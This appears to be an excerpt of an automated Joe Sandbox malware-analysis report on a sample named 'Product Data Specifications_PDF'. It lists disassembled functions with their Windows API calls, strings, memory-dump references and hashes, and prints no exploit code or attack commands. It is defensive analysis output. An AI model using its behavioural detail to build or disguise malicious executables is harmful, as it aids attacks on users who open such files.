                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                              • String ID: 0
                              • API String ID: 1441871840-4108050209
                              • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                              • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                              • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                              • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                              Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                              • __swprintf.LIBCMT ref: 00460915
                              • __swprintf.LIBCMT ref: 0046092D
                              • _wprintf.LIBCMT ref: 004609E1
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                              • API String ID: 3631882475-2268648507
                              • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                              • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                              • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                              • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                              Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                              Download Yara Rule
                              APIs
                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                              • SendMessageW.USER32 ref: 00471740
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                              • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                              • SendMessageW.USER32 ref: 0047184F
                              • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                              • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                              • String ID:
                              • API String ID: 4116747274-0
                              • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                              • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                              • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                              • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                              Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                              • _wcslen.LIBCMT ref: 00461683
                              • __swprintf.LIBCMT ref: 00461721
                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                              • GetDlgCtrlID.USER32(?), ref: 00461869
                              • GetWindowRect.USER32(?,?), ref: 004618A4
                              • GetParent.USER32(?), ref: 004618C3
                              • ScreenToClient.USER32(00000000), ref: 004618CA
                              • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                              • String ID: %s%u
                              • API String ID: 1899580136-679674701
                              • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                              • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                              • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                              • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                              Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                              Download Yara Rule
                              APIs
                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                              • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                              • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: InfoItemMenu$Sleep
                              • String ID: 0
                              • API String ID: 1196289194-4108050209
                              • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                              • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                              • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                              • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                              Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetDC.USER32(00000000), ref: 0043143E
                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                              • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                              • SelectObject.GDI32(00000000,?), ref: 00431466
                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                              • String ID: (
                              • API String ID: 3300687185-3887548279
                              • Opcode ID: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
                              • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                              • Opcode Fuzzy Hash: 553542ef25fd9631a2b80eb5934e7fdfb419610406a61b9b58c1a15d590a9b60
                              • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                              Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                              • GetDriveTypeW.KERNEL32 ref: 0045DB32
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                              • API String ID: 1976180769-4113822522
                              • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                              • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                              • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                              • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                              Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                              • String ID:
                              • API String ID: 461458858-0
                              • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                              • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                              • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                              • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                              Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                              • GlobalLock.KERNEL32(00000000), ref: 004300F6
                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                              • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                              • CloseHandle.KERNEL32(00000000), ref: 00430113
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                              • GlobalFree.KERNEL32(00000000), ref: 00430150
                              • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                              • DeleteObject.GDI32(?), ref: 004301D0
                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                              • String ID:
                              • API String ID: 3969911579-0
                              • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                              • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                              • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                              • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                              Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                              • String ID: 0
                              • API String ID: 956284711-4108050209
                              • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                              • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                              • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                              • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                              Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                              • String ID: 0.0.0.0
                              • API String ID: 1965227024-3771769585
                              • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                              • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                              • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                              • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                              Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: SendString$_memmove_wcslen
                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                              • API String ID: 369157077-1007645807
                              • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                              • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                              • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                              • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                              Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetParent.USER32 ref: 00445BF8
                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                              • __wcsicoll.LIBCMT ref: 00445C33
                              • __wcsicoll.LIBCMT ref: 00445C4F
                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsicoll$ClassMessageNameParentSend
                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                              • API String ID: 3125838495-3381328864
                              • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                              • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                              • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                              • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                              Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                              Download Yara Rule
                              APIs
                              • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                              • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                              • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                              • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                              • SendMessageW.USER32(?,00000402,?), ref: 00449399
